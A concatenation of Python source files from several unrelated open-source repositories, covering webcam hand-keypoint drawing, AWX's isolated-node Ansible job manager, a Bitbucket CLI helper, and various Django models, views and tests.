def __init__(self, jesture_runner, cam_id=0, width=640, height=480,
hand_box_tl=None, hand_box_br=None, draw_hand_box=False, mirror=False):
'''
Args:
hand_box_tl (tuple[2]): top-left corner of ui box with hands
hand_box_br (tuple[2]): bottom-right corner of ui box with hands
'''
self.jesture_runner = jesture_runner
self.cam_id = cam_id
self.width = width
self.height = height
self.stream = cv2.VideoCapture(self.cam_id)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
self.hand_box_tl = hand_box_tl
self.hand_box_br = hand_box_br
self.draw_hand_box = draw_hand_box
self.mirror = mirror
def _scale_and_shift(self, keypoints, scale, shift):
keypoints = np.array([scale[0], scale[1], 1]) * keypoints + np.array([shift[0], shift[1], 0])
return keypoints
def start(self):
logging.debug('[ThreadCameraDraw] Starting a thread...')
self.thread = Thread(name='Camera-Draw Python Thread', target=self.update, args=())
self.thread.start()
logging.debug('[ThreadCameraDraw] Thread started.')
return self
def update(self):
logged = False
while not self.stopped:
(self.grabbed, frame) = self.stream.read()
if not self.grabbed:
continue
display_height, display_width = frame.shape[:2]
if not logged:
print('Camera params was set to:', self.width, self.height)
print('Real params are:', display_width, display_height)
frame = cv2.resize(frame, (self.width, self.height))
# get current hand keypoints
left_keypoints = self.jesture_runner.get_hand_keypoints('left_keypoints')
right_keypoints = self.jesture_runner.get_hand_keypoints('right_keypoints')
left_keypoints = np.clip(left_keypoints, 0.0, 1.0) # !!!
right_keypoints = np.clip(right_keypoints, 0.0, 1.0) # !!!
# scale absolute keypoints by the actual display image size
left_keypoints = left_keypoints * np.array([display_width, display_height, 1.0])
if not logged: print(left_keypoints)
right_keypoints = right_keypoints * np.array([display_width, display_height, 1.0])
if not logged: print(right_keypoints)
if self.mirror:
left_keypoints[:,0] = display_width - left_keypoints[:,0]
right_keypoints[:,0] = display_width - right_keypoints[:,0]
# draw skeletons using screen-sized hand keypoints
frame = draw_skeleton(frame, left_keypoints)
frame = draw_skeleton(frame, right_keypoints)
# TODO: move all `ImageDraw` tasks to a separate thread or do it asynchronously
# draw a special box for scaled keypoints
if self.draw_hand_box:
frame = Image.fromarray(frame if type(np.array([])) == type(frame) else frame.get())
draw = ImageDraw.Draw(frame, "RGBA")
draw.rectangle((self.hand_box_tl, self.hand_box_br), fill=(0, 0, 0, 127), outline=(235, 190, 63, 255))
frame = np.array(frame).astype(np.uint8)
# get the scaled hand keypoints
scaled_left_keypoints = self.jesture_runner.get_hand_keypoints('scaled_left_keypoints')
scaled_right_keypoints = self.jesture_runner.get_hand_keypoints('scaled_right_keypoints')
scaled_left_keypoints = np.clip(scaled_left_keypoints, 0.0, 1.0) # !!!
scaled_right_keypoints = np.clip(scaled_right_keypoints, 0.0, 1.0) # !!!
# scale and shift them to be in a proper place on the display image
scale_x = (self.hand_box_br[0] - self.hand_box_tl[0]) // 2
scale_y = self.hand_box_br[1] - self.hand_box_tl[1]
scale = (scale_x, scale_y)
shift_left = (self.hand_box_tl[0], self.hand_box_tl[1])
shift_right = (self.hand_box_tl[0] + scale_x, self.hand_box_tl[1])
scaled_left_keypoints = self._scale_and_shift(
scaled_left_keypoints, scale=scale, shift=shift_left if self.mirror else shift_right)
scaled_right_keypoints = self._scale_and_shift(
scaled_right_keypoints, scale=scale, shift=shift_right if self.mirror else shift_left)
# draw scaled keypoints
frame = draw_skeleton(frame, scaled_left_keypoints, indices=False)
frame = draw_skeleton(frame, scaled_right_keypoints, indices=False)
# save to the field
self.frame = frame
if not logged:
logged = True
logging.debug('[ThreadCameraDraw] Frame loop finished.')
self.stream.release()
logging.debug('[ThreadCameraDraw] Capture released.')
def read(self):
return self.frame
    def stop(self):
logging.debug('[ThreadCameraDraw] Stopping...')
self.stopped = True
self.thread.join()
logging.debug('[ThreadCameraDraw] Camera thread joined.')
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
```
#### File: python/src/thread_camera.py
```python
from threading import Thread
import logging
import cv2
logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s')
class ThreadCamera:
def __init__(self, cam_id=0, width=640, height=480):
self.stream = cv2.VideoCapture(cam_id)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
self.thread = Thread(name='Camera Python Thread', target=self.update, args=())
self.thread.start()
return self
def update(self):
while not self.stopped:
(self.grabbed, self.frame) = self.stream.read()
logging.debug('[ThreadCamera] Frame loop finished.')
self.stream.release()
logging.debug('[ThreadCamera] Capture released.')
def read(self):
return self.frame
    def stop(self):
logging.debug('[ThreadCamera] Stopping...')
self.stopped = True
self.thread.join()
logging.debug('[ThreadCamera] Camera thread joined.')
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
```
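A minimal usage sketch for the threaded capture class above (assuming a working default webcam; `cv2` is already imported in this module):
```python
# Hypothetical usage: grab frames on a background thread and display them.
cam = ThreadCamera(cam_id=0, width=640, height=480).start()
try:
    while True:
        frame = cam.read()
        if frame is None:
            continue
        cv2.imshow('camera', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
finally:
    cam.stop()
    cv2.destroyAllWindows()
```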
|
{
"source": "JestyDS/awx",
"score": 2
}
|
#### File: main/isolated/manager.py
```python
import fnmatch
import json
import os
import shutil
import stat
import tempfile
import time
import logging
import yaml
from django.conf import settings
import ansible_runner
import awx
from awx.main.utils import (
get_system_task_capacity
)
logger = logging.getLogger('awx.isolated.manager')
playbook_logger = logging.getLogger('awx.isolated.manager.playbooks')
def set_pythonpath(venv_libdir, env):
env.pop('PYTHONPATH', None) # default to none if no python_ver matches
for version in os.listdir(venv_libdir):
if fnmatch.fnmatch(version, 'python[23].*'):
if os.path.isdir(os.path.join(venv_libdir, version)):
env['PYTHONPATH'] = os.path.join(venv_libdir, version, "site-packages") + ":"
break
class IsolatedManager(object):
def __init__(self, event_handler, canceled_callback=None, check_callback=None, pod_manager=None):
"""
:param event_handler: a callable used to persist event data from isolated nodes
:param canceled_callback: a callable - which returns `True` or `False`
- signifying if the job has been prematurely
canceled
"""
self.event_handler = event_handler
self.canceled_callback = canceled_callback
self.check_callback = check_callback
self.started_at = None
self.captured_command_artifact = False
self.instance = None
self.pod_manager = pod_manager
def build_inventory(self, hosts):
if self.instance and self.instance.is_containerized:
inventory = {'all': {'hosts': {}}}
fd, path = tempfile.mkstemp(
prefix='.kubeconfig', dir=self.private_data_dir
)
with open(path, 'wb') as temp:
temp.write(yaml.dump(self.pod_manager.kube_config).encode())
temp.flush()
os.chmod(temp.name, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
for host in hosts:
inventory['all']['hosts'][host] = {
"ansible_connection": "kubectl",
"ansible_kubectl_config": path,
}
else:
inventory = '\n'.join([
'{} ansible_ssh_user={}'.format(host, settings.AWX_ISOLATED_USERNAME)
for host in hosts
])
return inventory
def build_runner_params(self, hosts, verbosity=1):
env = dict(os.environ.items())
env['ANSIBLE_RETRY_FILES_ENABLED'] = 'False'
env['ANSIBLE_HOST_KEY_CHECKING'] = str(settings.AWX_ISOLATED_HOST_KEY_CHECKING)
env['ANSIBLE_LIBRARY'] = os.path.join(os.path.dirname(awx.__file__), 'plugins', 'isolated')
set_pythonpath(os.path.join(settings.ANSIBLE_VENV_PATH, 'lib'), env)
def finished_callback(runner_obj):
if runner_obj.status == 'failed' and runner_obj.config.playbook != 'check_isolated.yml':
# failed for clean_isolated.yml just means the playbook hasn't
# exited on the isolated host
stdout = runner_obj.stdout.read()
playbook_logger.error(stdout)
elif runner_obj.status == 'timeout':
# this means that the default idle timeout of
# (2 * AWX_ISOLATED_CONNECTION_TIMEOUT) was exceeded
# (meaning, we tried to sync with an isolated node, and we got
# no new output for 2 * AWX_ISOLATED_CONNECTION_TIMEOUT seconds)
# this _usually_ means SSH key auth from the controller ->
# isolated didn't work, and ssh is hung waiting on interactive
# input e.g.,
#
# awx@isolated's password:
stdout = runner_obj.stdout.read()
playbook_logger.error(stdout)
else:
playbook_logger.info(runner_obj.stdout.read())
return {
'project_dir': os.path.abspath(os.path.join(
os.path.dirname(awx.__file__),
'playbooks'
)),
'inventory': self.build_inventory(hosts),
'envvars': env,
'finished_callback': finished_callback,
'verbosity': verbosity,
'cancel_callback': self.canceled_callback,
'settings': {
'job_timeout': settings.AWX_ISOLATED_LAUNCH_TIMEOUT,
'suppress_ansible_output': True,
},
}
def path_to(self, *args):
return os.path.join(self.private_data_dir, *args)
def run_management_playbook(self, playbook, private_data_dir, idle_timeout=None, **kw):
iso_dir = tempfile.mkdtemp(
prefix=playbook,
dir=private_data_dir
)
params = self.runner_params.copy()
params['playbook'] = playbook
params['private_data_dir'] = iso_dir
if idle_timeout:
params['settings']['idle_timeout'] = idle_timeout
else:
params['settings'].pop('idle_timeout', None)
params.update(**kw)
if all([
getattr(settings, 'AWX_ISOLATED_KEY_GENERATION', False) is True,
getattr(settings, 'AWX_ISOLATED_PRIVATE_KEY', None)
]):
params['ssh_key'] = settings.AWX_ISOLATED_PRIVATE_KEY
return ansible_runner.interface.run(**params)
def dispatch(self, playbook=None, module=None, module_args=None):
'''
Ship the runner payload to a remote host for isolated execution.
'''
self.handled_events = set()
self.started_at = time.time()
# exclude certain files from the rsync
rsync_exclude = [
# don't rsync source control metadata (it can be huge!)
'- /project/.git',
'- /project/.svn',
'- /project/.hg',
# don't rsync job events that are in the process of being written
'- /artifacts/job_events/*-partial.json.tmp',
# don't rsync the ssh_key FIFO
'- /env/ssh_key',
# don't rsync kube config files
'- .kubeconfig*'
]
for filename, data in (
['.rsync-filter', '\n'.join(rsync_exclude)],
):
path = self.path_to(filename)
with open(path, 'w') as f:
f.write(data)
os.chmod(path, stat.S_IRUSR)
extravars = {
'src': self.private_data_dir,
'dest': settings.AWX_PROOT_BASE_PATH,
'ident': self.ident
}
if playbook:
extravars['playbook'] = playbook
if module and module_args:
extravars['module'] = module
extravars['module_args'] = module_args
logger.debug('Starting job {} on isolated host with `run_isolated.yml` playbook.'.format(self.instance.id))
runner_obj = self.run_management_playbook('run_isolated.yml',
self.private_data_dir,
idle_timeout=max(60, 2 * settings.AWX_ISOLATED_CONNECTION_TIMEOUT),
extravars=extravars)
if runner_obj.status == 'failed':
self.instance.result_traceback = runner_obj.stdout.read()
self.instance.save(update_fields=['result_traceback'])
return 'error', runner_obj.rc
return runner_obj.status, runner_obj.rc
def check(self, interval=None):
"""
Repeatedly poll the isolated node to determine if the job has run.
On success, copy job artifacts to the controlling node.
On failure, continue to poll the isolated node (until the job timeout
is exceeded).
For a completed job run, this function returns (status, rc),
representing the status and return code of the isolated
`ansible-playbook` run.
:param interval: an interval (in seconds) to wait between status polls
"""
interval = interval if interval is not None else settings.AWX_ISOLATED_CHECK_INTERVAL
extravars = {'src': self.private_data_dir}
status = 'failed'
rc = None
last_check = time.time()
while status == 'failed':
canceled = self.canceled_callback() if self.canceled_callback else False
if not canceled and time.time() - last_check < interval:
# If the job isn't canceled, but we haven't waited `interval` seconds, wait longer
time.sleep(1)
continue
if canceled:
logger.warning('Isolated job {} was manually canceled.'.format(self.instance.id))
logger.debug('Checking on isolated job {} with `check_isolated.yml`.'.format(self.instance.id))
runner_obj = self.run_management_playbook('check_isolated.yml',
self.private_data_dir,
extravars=extravars)
status, rc = runner_obj.status, runner_obj.rc
if self.check_callback is not None and not self.captured_command_artifact:
command_path = self.path_to('artifacts', self.ident, 'command')
# If the configuration artifact has been synced back, update the model
if os.path.exists(command_path):
try:
with open(command_path, 'r') as f:
data = json.load(f)
self.check_callback(data)
self.captured_command_artifact = True
except json.decoder.JSONDecodeError: # Just in case it's not fully here yet.
pass
self.consume_events()
last_check = time.time()
if status == 'successful':
status_path = self.path_to('artifacts', self.ident, 'status')
rc_path = self.path_to('artifacts', self.ident, 'rc')
if os.path.exists(status_path):
with open(status_path, 'r') as f:
status = f.readline()
with open(rc_path, 'r') as f:
rc = int(f.readline())
else:
# if there's no status file, it means that runner _probably_
# exited with a traceback (which should be logged to
# daemon.log) Record it so we can see how runner failed.
daemon_path = self.path_to('daemon.log')
if os.path.exists(daemon_path):
with open(daemon_path, 'r') as f:
self.instance.result_traceback = f.read()
self.instance.save(update_fields=['result_traceback'])
else:
logger.error('Failed to rsync daemon.log (is ansible-runner installed on the isolated host?)')
status = 'failed'
rc = 1
# consume events one last time just to be sure we didn't miss anything
# in the final sync
self.consume_events()
return status, rc
def consume_events(self):
# discover new events and ingest them
events_path = self.path_to('artifacts', self.ident, 'job_events')
# it's possible that `events_path` doesn't exist *yet*, because runner
# hasn't actually written any events yet (if you ran e.g., a sleep 30)
# only attempt to consume events if any were rsynced back
if os.path.exists(events_path):
for event in set(os.listdir(events_path)) - self.handled_events:
path = os.path.join(events_path, event)
if os.path.exists(path) and os.path.isfile(path):
try:
event_data = json.load(
open(os.path.join(events_path, event), 'r')
)
except json.decoder.JSONDecodeError:
# This means the event we got back isn't valid JSON
# that can happen if runner is still partially
# writing an event file while it's rsyncing
# these event writes are _supposed_ to be atomic
# but it doesn't look like they actually are in
# practice
# in this scenario, just ignore this event and try it
# again on the next sync
continue
self.event_handler(event_data)
self.handled_events.add(event)
def cleanup(self):
extravars = {
'private_data_dir': self.private_data_dir,
'cleanup_dirs': [
self.private_data_dir,
],
}
logger.debug('Cleaning up job {} on isolated host with `clean_isolated.yml` playbook.'.format(self.instance.id))
self.run_management_playbook(
'clean_isolated.yml',
self.private_data_dir,
extravars=extravars
)
@classmethod
def update_capacity(cls, instance, task_result):
instance.version = 'ansible-runner-{}'.format(task_result['version'])
if instance.capacity == 0 and task_result['capacity_cpu']:
logger.warning('Isolated instance {} has re-joined.'.format(instance.hostname))
instance.cpu = int(task_result['cpu'])
instance.memory = int(task_result['mem'])
instance.cpu_capacity = int(task_result['capacity_cpu'])
instance.mem_capacity = int(task_result['capacity_mem'])
instance.capacity = get_system_task_capacity(scale=instance.capacity_adjustment,
cpu_capacity=int(task_result['capacity_cpu']),
mem_capacity=int(task_result['capacity_mem']))
instance.save(update_fields=['cpu', 'memory', 'cpu_capacity', 'mem_capacity', 'capacity', 'version', 'modified'])
def health_check(self, instance_qs):
'''
:param instance_qs: List of Django objects representing the
isolated instances to manage
Runs playbook that will
- determine if instance is reachable
- find the instance capacity
- clean up orphaned private files
Performs save on each instance to update its capacity.
'''
instance_qs = [i for i in instance_qs if i.enabled]
if not len(instance_qs):
return
try:
private_data_dir = tempfile.mkdtemp(
prefix='awx_iso_heartbeat_',
dir=settings.AWX_PROOT_BASE_PATH
)
self.runner_params = self.build_runner_params([
instance.hostname for instance in instance_qs
])
self.runner_params['private_data_dir'] = private_data_dir
self.runner_params['forks'] = len(instance_qs)
runner_obj = self.run_management_playbook(
'heartbeat_isolated.yml',
private_data_dir
)
for instance in instance_qs:
task_result = {}
try:
task_result = runner_obj.get_fact_cache(instance.hostname)
except Exception:
logger.exception('Failed to read status from isolated instances')
if 'awx_capacity_cpu' in task_result and 'awx_capacity_mem' in task_result:
task_result = {
'cpu': task_result['awx_cpu'],
'mem': task_result['awx_mem'],
'capacity_cpu': task_result['awx_capacity_cpu'],
'capacity_mem': task_result['awx_capacity_mem'],
'version': task_result['awx_capacity_version']
}
IsolatedManager.update_capacity(instance, task_result)
logger.debug('Isolated instance {} successful heartbeat'.format(instance.hostname))
elif instance.capacity == 0:
logger.debug('Isolated instance {} previously marked as lost, could not re-join.'.format(
instance.hostname))
else:
logger.warning('Could not update status of isolated instance {}'.format(instance.hostname))
if instance.is_lost(isolated=True):
instance.capacity = 0
instance.save(update_fields=['capacity'])
logger.error('Isolated instance {} last checked in at {}, marked as lost.'.format(
instance.hostname, instance.modified))
finally:
if os.path.exists(private_data_dir):
shutil.rmtree(private_data_dir)
def run(self, instance, private_data_dir, playbook, module, module_args, ident=None):
"""
Run a job on an isolated host.
:param instance: a `model.Job` instance
:param private_data_dir: an absolute path on the local file system
where job-specific data should be written
(i.e., `/tmp/awx_N_xyz/`)
:param playbook: the playbook to run
:param module: the module to run
:param module_args: the module args to use
For a completed job run, this function returns (status, rc),
representing the status and return code of the isolated
`ansible-playbook` run.
"""
self.ident = ident
self.instance = instance
self.private_data_dir = private_data_dir
self.runner_params = self.build_runner_params(
[instance.execution_node],
verbosity=min(5, self.instance.verbosity)
)
status, rc = self.dispatch(playbook, module, module_args)
if status == 'successful':
status, rc = self.check()
return status, rc
```
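A compressed sketch of how the public pieces fit together (not taken from the AWX codebase; `job`, `save_event` and the temporary directory are hypothetical stand-ins for a Job model instance, an event-persisting callable and the job's private data dir):
```python
# Hypothetical lifecycle sketch for IsolatedManager.
mgr = IsolatedManager(event_handler=save_event, canceled_callback=lambda: False)
status, rc = mgr.run(job, '/tmp/awx_42_abc/', playbook='some_playbook.yml',
                     module=None, module_args=None, ident=str(job.id))
mgr.cleanup()
```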
|
{
"source": "jesuejunior/b2tool",
"score": 2
}
|
#### File: b2tool/b2tool/conf.py
```python
import ConfigParser
import os
BASE_URL_V1 = 'https://bitbucket.org/api/1.0/'
BASE_URL_V2 = 'https://bitbucket.org/api/2.0/'
CFGFILE = os.path.join(os.path.expanduser('~'), '.b2tool')
def get_or_default(config, section, key, default=''):
try:
return config.get(section, key)
except ConfigParser.NoSectionError:
return default
except ConfigParser.NoOptionError:
return default
def get_credentials():
if os.path.isfile(CFGFILE):
conf = ConfigParser.SafeConfigParser()
conf.read(CFGFILE)
username = get_or_default(conf, 'AUTH', 'username')
password = get_or_default(conf, 'AUTH', 'password')
return username,password
else:
return '',''
```
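`get_credentials` expects a plain INI file at `~/.b2tool` with an `AUTH` section; a hypothetical way to create one matching the option names read above:
```python
# Hypothetical sketch: write a ~/.b2tool file that get_credentials() can parse.
import os
path = os.path.join(os.path.expanduser('~'), '.b2tool')
with open(path, 'w') as f:
    f.write("[AUTH]\nusername = your-bitbucket-user\npassword = your-bitbucket-password\n")
```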
#### File: b2tool/b2tool/rules.py
```python
from datetime import datetime
import re
class Pull(object):
"""
"""
def __init__(self, *args, **kwargs):
self.args, self.kwargs = args, kwargs
@staticmethod
def oldest(objects):
# ['source']['repository']['name']
# "state": "OPEN",
# "created_on": "2014-08-17T05:39:38.501662+00:00",
# "updated_on": "2014-08-17T05:39:38.521747+00:00",
# "merge_commit": null,
# "id": 9
# ['source']['branch']['name']
objs = []
for obj in objects:
if not objs:
objs.append(obj)
created_on = parse_date(obj.get('created_on'))
if created_on < parse_date(objs[0].get('created_on')):
objs.pop()
objs.append(obj)
if objs:
return {'branch': objs[0]['source']['branch']['name'], 'id': objs[0].get('id')}
else:
return {}
def parse_date(dt):
#['2014', '08', '16', '05', '39', '38', '501662', '00', '00']
# 0 = year
# 1 = month
# 2 = day
# 3 = hour
# 4 = minutes
# 5 = seconds
result = map(lambda x: int(x), re.findall('\d{1,4}\d{1,2}', dt))
for i in range(0,3):
result.pop()
return datetime(*result)
```
#### File: b2tool/test/pull_request_test.py
```python
import unittest
import mock
from b2tool.commands import listall
class PullRequestTest(unittest.TestCase):
def setUp(self):
self.obj = [
{
u"source": {
u"branch": {
u"name": u"develop"
}
},
u"state": u"OPEN",
u"created_on": u"2014-08-07T03:41:17.181902+00:00",
u"updated_on": u"2014-08-18T21:08:13.471908+00:00",
u"merge_commit": 'null',
u"id": 85
},
{
u'source': {
u'branch': {
u'name': u'feature/new-config-vagrantfile'
},
},
u"state": u"OPEN",
u"created_on": u"2014-08-13T00:55:43.127689+00:00",
u"updated_on": u"2014-08-18T18:31:42.329587+00:00",
u"merge_commit": 'null',
u"id": 86
}
]
self.response = mock.MagicMock()
self.response.headers = {}
self.response.status_code = 000
def test_get_all_pull_requests(self):
self.response.status_code = 200
with mock.patch("requests.get", return_value=self.response):
res = listall('test123', '123test')
self.assertEquals(res, 1)
def test_get_oldest_pull_request(self):
self.fail()
```
|
{
"source": "jesuejunior/django-modeanalytics",
"score": 3
}
|
#### File: django-modeanalytics/modeanalytics/tests.py
```python
from typing import Dict
from django.conf import settings
from django.test import TestCase
from .models import ModeReportModel
class TestGenerateReportUrl(TestCase):
"""
How to validate using a mode tool
Link: https://mode.com/help/articles/test-your-white-label-embeds/
"""
settings.MODE_ORG = "test"
settings.MODE_ACCESS_KEY = "1234567890"
settings.MODE_ACCESS_SECRET = "0987654321"
def test_create_url_ok(self):
ts: int = 1_532_446_786
expected = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786"
model = ModeReportModel()
model.name = "test1"
model.run_token = "<PASSWORD>"
result: str = model._ModeReportModel__create_url(ts)
self.assertEqual(expected, result)
def test_sign_url_ok(self):
ts: int = 1_532_446_786
url = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786"
model = ModeReportModel()
model.name = "test1"
model.run_token = "<PASSWORD>"
result: str = model._ModeReportModel__sign_url(url, ts)
expected: str = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786&signature=bce6321f616c77321e8dcc7943b6f3f8c23425b23c87a14a23395a423f605da9"
self.assertEqual(expected, result)
def test_params_ok(self):
model = ModeReportModel()
model.name = "testx"
model.run_token = "<PASSWORD>"
params: Dict[str, str] = {"email": "<EMAIL>"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "<EMAIL>"}
self.assertEqual(expected, model.params)
def test_params_error(self):
model = ModeReportModel()
model.name = "testy"
model.run_token = "<PASSWORD>"
params: Dict[str, str] = {"email": "jj@<PASSWORD>"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "email": "jj<PASSWORD>"}
self.assertNotEqual(expected, model.params)
def test_params_override(self):
model = ModeReportModel()
model.name = "testy"
model.run_token = "<PASSWORD>"
model.params.update({"display[]": "right_side"})
params: Dict[str, str] = {"email": "jj<PASSWORD>", "display[]": "left_side"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "jj@admin", "param_display[]": "left_side"}
self.assertEqual(expected, model.params)
def test_params_saved_override(self):
model = ModeReportModel()
model.id = 1
model.name = "testy"
model.run_token = "<PASSWORD>"
model.params.update({"email": ""})
model.save()
params: Dict[str, str] = {"email": "<EMAIL>", "phone": ""}
report = ModeReportModel.objects.get(pk=1)
report._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "<EMAIL>", "param_phone": ""}
self.assertEqual(expected, report.params)
def test_mixed_params(self):
"""
Test when there are params from web and from db with same names
emails[] -> db
emails -> web
"""
pass
def test_get_full_report_url(self):
"""
Makes sense test it?
"""
pass
```
|
{
"source": "jesuejunior/luiza",
"score": 2
}
|
#### File: maria/jose/tests.py
```python
from __future__ import unicode_literals
import json
import pytest
from model_mommy import mommy
from .models import Employee
@pytest.mark.django_db
class EmployeeModelTest:
def test_create_correct_user(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
user = Employee.objects.create(**data)
assert user.id == 1
assert user.name == '<NAME>'
assert user.email == '<EMAIL>'
assert user.department == 'mobile'
@pytest.mark.django_db
class EmployeeApiTest:
@pytest.fixture(autouse=True)
def setUp(self, client):
self.client = client
def test_create_employee_ok(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 201
def test_create_employee_with_wrong_data(self):
data = {
"name": "<NAME>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 400
def test_email_exist_return_error(self):
mommy.make_one(Employee, email='<EMAIL>')
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 400
assert response.data.get('message') == u'E-mail already exists'
def test_create_employee_and_saved_into_db(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
employee = Employee.objects.get(email='<EMAIL>')
assert employee.name == u'<NAME>'
assert employee.email == '<EMAIL>'
assert employee.department == 'mobile'
def test_list_empty_employees(self):
response = self.client.get('/employee/', content_type='application/javascript')
assert response.data == []
def test_list_with_some_employees(self):
mommy.make_many(Employee, 5)
response = self.client.get('/employee/', content_type='application/javascript')
assert len(response.data) == 5
def test_delete_employee(self):
mommy.make_one(Employee, id=1)
mommy.make_many(Employee, 5)
response = self.client.delete('/employee/1', content_type='application/javascript')
assert response.status_code == 204
def test_try_delete_employee_not_found(self):
mommy.make_many(Employee, 5)
response = self.client.delete('/employee/1234', content_type='application/javascript')
assert response.status_code == 204
def test_delete_employee_check_in_db(self):
mommy.make_one(Employee, id=1)
mommy.make_many(Employee, 5)
assert Employee.objects.count() == 6
self.client.delete('/employee/1', content_type='application/javascript')
assert Employee.objects.count() == 5
```
|
{
"source": "jesuejunior/rocket",
"score": 2
}
|
#### File: nepal/tests/test_container.py
```python
from __future__ import print_function
import json
import pytest
from nepal.models.container import Container
from nepal.models.node import Node
from profile.models.user import User
from toolbox.icepick import ordered
@pytest.mark.django_db
class ContainerTest:
@pytest.fixture(autouse=True)
def setUp(self, client):
self.client = client
self.user = User.objects.create_user(email='<EMAIL>', password='<PASSWORD>')
response = self.client.post('/users/login', data={'email': '<EMAIL>',
'password': '<PASSWORD>'})
token = response.data.get('token')
self.headers = {'HTTP_AUTHORIZATION': 'JWT {0}'.format(token)}
node1 = {
'name': 'node1',
'so': 'centos',
'provider': 'do',
'ip': '192.168.127.12'
}
self.node = Node.objects.create(**node1)
container1 = {
'id': 100,
'name': 'container1',
'config': {}
}
self.container = Container.objects.create(**container1)
self.container.nodes.add(self.node)
@pytest.mark.django_db(transaction=True)
def test_create_new_container(self):
data = {
'name': 'container_test',
'nodes': [self.node.id],
'config': {
"registry": {
"image": "registry:2.4",
"environment": [
"RACK_ENV=development",
"SHOW=true",
"DEBUG=False"
],
"volumes": [
"/opt/registry/tmp:/tmp/registry-dev:Z",
"/opt/nginx/certs:/certs:Z"
],
"expose": [
5000
],
"ports": [
"5000:5000"
]
}
}
}
result = self.client.post('/containers', data=json.dumps(data),
content_type='application/json', **self.headers)
# TODO: must be assert more things
assert 201 == result.status_code
result_db = Container.objects.get(name='container_test')
assert 'container_test' == result_db.name
assert ordered(data.get('config')) == ordered(result_db.config)
@pytest.mark.xfail
@pytest.mark.django_db(transaction=True)
def test_start_a_container(self):
response = self.client.get('/conteiners/1/?action=start',
content_type='application/json', **self.headers)
assert {} == response.data
@pytest.mark.django_db(transaction=True)
def test_get_container_all(self):
response = self.client.get('/containers',
content_type='application/json', **self.headers)
assert 1 == len(response.data)
@pytest.mark.django_db(transaction=True)
def test_get_container_by_id(self):
response = self.client.get('/containers/100', content_type='application/json',
**self.headers)
result = response.data
assert 200 == response.status_code
assert 100 == result.get('id')
@pytest.mark.django_db(transaction=True)
def test_update_container_ok(self):
data = {
'name': 'app1',
'nodes': [self.node.id],
'config': {
"registry": {
"image": "registry:2.4",
"environment": [
"RACK_ENV=development",
"SHOW=true",
"DEBUG=False"
],
"expose": [
5000
],
"ports": [
"5000:5000"
]
}
}
}
response = self.client.put('/containers/100', data=json.dumps(data),
content_type='application/json', **self.headers)
assert 200 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_try_update_container_not_found(self):
response = self.client.put('/containers/132', data=json.dumps({}),
content_type='application/json', **self.headers)
assert 404 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_delete_container_ok(self):
response = self.client.delete('/containers/100', content_type='application/json',
**self.headers)
assert 204 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_try_delete_container_that_not_exist(self):
response = self.client.delete('/containers/122', content_type='application/json',
**self.headers)
assert 404 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_get_count_nodes(self):
result = self.client.get('/containers?action=count', content_type='application/json',
**self.headers)
assert 200 == result.status_code
assert 1 == result.data.get('result')
```
|
{
"source": "jesuejunior/stone",
"score": 3
}
|
#### File: jesuejunior/stone/generator.py
```python
import string
import random
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
for x in range(0, 10):
print(id_generator())
```
#### File: onix/views/block.py
```python
from braces.views import LoginRequiredMixin
from django.core.paginator import Paginator, PageNotAnInteger, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, render
from django.template.response import TemplateResponse
from django.views.generic import View, ListView
from onix.models import Block, Material
from tools.code_generator import generate_code
class BlockTemplateView(LoginRequiredMixin, View):
template_name = 'block/new.html'
def get(self, request, *args, **kwargs):
cxt = self.get_context_data(request)
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def post(self, request, *args, **kwargs):
cxt = self.get_context_data(request)
material_id = request.POST.get('material_id')
number = request.POST.get('number')
code = None
while(True):
code = generate_code()
if not Block.objects.filter(code=code).exists():
break
if request.user.is_authenticated() and number and material_id:
if Block.objects.filter(material_id=material_id, number=number).exists():
material = Material.objects.get(pk=material_id).name
cxt['message']= u'O código [{0}] já foi utilizada para [{1}], por favor verifique os dados.'.format(number, material)
cxt['status'] = 'error'
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
status=400,
**kwargs
)
result = Block.objects.get_or_create(material_id=material_id, number=number, code=code)
saved = result[0].save()
if saved:
return HttpResponse(reverse('blocks'), content={'message': 'Bloco criado com sucesso.', 'status': 'ok'})
